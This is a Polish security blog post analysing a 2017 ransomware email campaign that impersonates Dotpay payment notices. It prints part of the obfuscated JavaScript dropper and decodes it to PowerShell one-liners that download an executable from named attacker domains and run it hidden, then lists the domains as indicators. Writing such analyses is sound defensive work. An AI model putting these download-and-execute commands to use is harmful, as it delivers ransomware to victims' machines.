Uwaga na nową kampanię malware „Platnosc w systemie Dotpay”

dodał 21 listopada 2017 o 09:29 w kategorii Złośniki  z tagami:
Uwaga na nową kampanię malware „Platnosc w systemie Dotpay”

Od wczoraj obserwujemy nową falę wiadomości ze złośliwym załącznikiem, tym razem podszywających się pod markę Dotpay. Kliknięcie w załącznik poskutkuje zaszyfrowaniem komputera, dlatego warto ostrzec znajomych.

Od ponad miesiąca nie widzieliśmy żadnej nowej kampanii najbardziej płodnego polskiego autora ataków emailowych. Czekaliśmy, czekaliśmy aż się doczekaliśmy – od wczoraj trwa nowa fala wysyłek, które opisujemy poniżej.

Platnosc w systemie Dotpay

Otrzymaliśmy kilka próbek ataków, dzięki czemu możemy stwierdzić, że ich autor tym razem spróbował trochę innej strategii. Co prawda większość elementów kampanii jest taka sama jak zawsze, lecz tematy i treść wiadomości ulegają drobnym modyfikacjom. Wiadomość wygląda tak:

Zarówno numer transakcji znajdujący się w temacie wiadomości jak i kwota transakcji różni się pomiędzy próbkami. Wczoraj email wskazywał datę 20 listopada z taką samą godziną, dzisiaj data została przesunięta o 24 godziny do przodu. To ciekawy błąd ze strony atakującego, ponieważ w obu przypadkach godzina transakcji wskazywała przyszłość w momencie otrzymania emaila przez odbiorcę. Dzisiejsza wiadomość ma polskie znaki prawie wszędzie (oprócz „Wplata online” i nazwy załącznika), wczorajsza była prawie w całości polskich znaków pozbawiona.

Aspekty techniczne

Wiadomość jest – jak zawsze – wysłana z serwerów nazwa.pl

Received: from amx216.rev.netart.pl (amx216.rev.netart.pl [85.128.206.216])

Załącznik to plik archiwum

Platnosc_w_systemie_Dotpay_M6694-5134_PDF.z

W pliku znajduje się folder

Platnosc_w_systemie_Dotpay_M6694-5134_PDF

w którym umieszczony jest plik

Płatnosc_w_systemie_Dotpay_M6694-5134_PDF.js

Początek pliku wygląda tak:

var _0xc9a5=["\x73\x68\x65\x6C\x6C\x2E\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x70\x6F\x77\x65\x72\x73\x68\x65\x6C\x6C\x2E\x65\x78\x65","\x70\x6F\x

Po odciemnieniu dostajemy polecenie PowerShella:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB0AGUAbgBvAHIALgBjAG8AbQAuAHAAbAAvAHAAbABpAGsAaQAvAGIAaQBuAHMAdAB4AHQALgBlAHgAZQAnACwAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAGIAaQBuAHMALgBlAHgAZQAdICkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAdICQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAYgBpAG4AcwAuAGUAeABlAB0gKQA=

Zdekodowanie base64 daje

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://tenor.com.pl/pliki/binstxt.exe', $env:APPDATA\bins.exe );Start-Process ( $env:APPDATA\bins.exe )

W drugim obserwowanym wariancie otrzymujemy

PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://faashionelka.pl/online/binstxt.exe', $env:APPDATA\msedge.exe );Start-Process ( $env:APPDATA\msedge.exe )

Oba pliki EXE są identyczne i jest to ransomware Flotera (VT, HA). Używa on serwera

plaamkaa.eu

ukrytego za Cloudflare. Autor ransomware prosi o kontakt pod adresami email [email protected] lub [email protected]

Użyte domeny:

  • faashionelka.pl, zarejestrowana 2017.11.20 21:04:20 za pośrednictwem NetArt, schowana za Cloudflare
  • plaamkaa.eu, zarejestrowana 2017.11.19 za pośrednictwem NetArt, schowana za Cloudflare
  • tenor.com.pl stara domena, prawdopodobnie zhakowana.
Podziękowanie i prośba
Dziękujemy wszystkim nadsyłającym próbki. Pamiętajcie, że jeśli dostajecie podejrzane wiadomości, zawsze możecie je odpowiednio zapisać i podrzucić je nam do analizy.